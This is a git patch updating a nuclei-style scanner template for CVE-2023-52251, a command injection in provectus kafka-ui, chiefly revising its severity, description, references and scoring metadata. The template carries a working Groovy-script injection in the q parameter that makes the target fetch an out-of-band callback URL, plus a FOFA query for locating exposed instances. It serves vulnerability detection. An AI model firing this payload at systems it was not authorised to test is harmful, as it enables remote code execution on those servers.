From 55b1e930ef0a77b3dc5389ebcfce0479ab9028e4 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Thu, 14 Mar 2024 15:48:27 +0530
Subject: [PATCH] Update CVE-2023-52251.yaml

---
 http/cves/2023/CVE-2023-52251.yaml | 33 ++++++++++++++++++------------
 1 file changed, 20 insertions(+), 13 deletions(-)

diff --git a/http/cves/2023/CVE-2023-52251.yaml b/http/cves/2023/CVE-2023-52251.yaml
index 85d518d9f6..84e54aaa0b 100644
--- a/http/cves/2023/CVE-2023-52251.yaml
+++ b/http/cves/2023/CVE-2023-52251.yaml
@@ -1,25 +1,32 @@
 id: CVE-2023-52251
 
 info:
-  name: kafka-ui - RCE
+  name: Kafka UI 0.7.1 Command Injection
   author: yhy0
-  severity: critical
+  severity: high
   description: |
-    Remote Code Execution vulnerability provectus/kafka-ui.
-  remediation: |
-    Do not expose to the Internet
+    An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
   reference:
     - https://github.com/BobTheShoplifter/CVE-2023-52251-POC
     - https://github.com/provectus/kafka-ui
+    - http://packetstormsecurity.com/files/177214/Kafka-UI-0.7.1-Command-Injection.html
+    - https://github.com/nomi-sec/PoC-in-GitHub
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2023-52251
+    cwe-id: CWE-94
+    epss-score: 0.02881
+    epss-percentile: 0.90497
+    cpe: cpe:2.3:a:provectus:ui:*:*:*:*:*:kafka:*:*
   metadata:
-    max-request: 3
-    fofa-query: icon_hash="-1477045616"
     verified: true
-  tags: cve,cve2023,rce,kafka,kafka-ui
+    max-request: 3
+    vendor: provectus
+    product: ui
+    framework: kafka
+    fofa-query: icon_hash="-1477045616"
+  tags: packetstorm,cve,cve2023,rce,kafka,kafka-ui
 
 http:
   - method: GET
@@ -27,7 +34,7 @@ http:
       - "{{BaseURL}}/api/clusters"
       - "{{BaseURL}}/api/clusters/{{cluster}}/topics?showInternal=true&search=&orderBy=NAME&sortOrder=ASC"
       - "{{BaseURL}}/api/clusters/{{cluster}}/topics/{{topic}}/messages?q=new%20URL%28%22http%3A%2F%2F{{interactsh-url}}%22%29.text&filterQueryType=GROOVY_SCRIPT&attempt=2&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING"
-    
+
     matchers-condition: and
     matchers:      
       - type: dsl
@@ -36,19 +43,19 @@ http:
           - 'contains(body, "status\":\"online")'
           - 'status_code == 200'
         condition: and
-      
+
       - type: dsl
         dsl:
           - 'contains(content_type, "application/json")'
           - 'contains(body, "name")'
           - "status_code == 200"
         condition: and
-    
+
       - type: word
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-          
+
     extractors:
       - type: json
         name: cluster